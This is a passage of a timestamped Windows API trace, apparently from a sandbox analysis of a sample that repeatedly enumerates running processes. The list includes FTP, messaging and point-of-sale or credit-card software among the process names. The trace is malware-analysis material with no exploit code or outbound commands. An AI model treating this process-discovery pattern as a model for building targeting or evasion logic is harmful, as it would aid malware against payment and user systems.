hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0156.752] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0156.754] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0156.756] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0156.758] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0156.759] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0156.761] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0156.763] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0156.765] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0156.767] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0156.768] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0156.770] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0156.772] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0156.774] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0156.776] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0156.778] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0156.779] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0156.781] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0156.784] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0156.786] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0156.788] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0156.789] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0156.791] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0156.793] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0156.795] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0156.797] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0156.798] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0156.800] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.802] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0156.803] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.805] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0156.807] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0156.808] CloseHandle (hObject=0x1f00) returned 1 [0156.808] Sleep (dwMilliseconds=0x64) [0157.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b7c [0157.035] Process32First (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.037] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.039] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.042] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.045] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.048] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.050] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.052] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.053] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.088] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.090] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.091] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.092] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.095] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.097] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.099] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.101] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.103] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.105] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.107] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.113] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0157.118] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.121] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0157.123] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.126] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0157.135] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0157.139] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0157.141] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0157.143] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.147] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0157.150] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.152] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.154] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0157.157] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0157.159] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.162] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.164] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.166] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.169] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.171] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0157.177] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0157.179] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0157.182] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0157.184] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0157.186] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0157.188] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0157.191] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0157.194] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0157.196] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0157.198] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0157.200] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0157.203] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 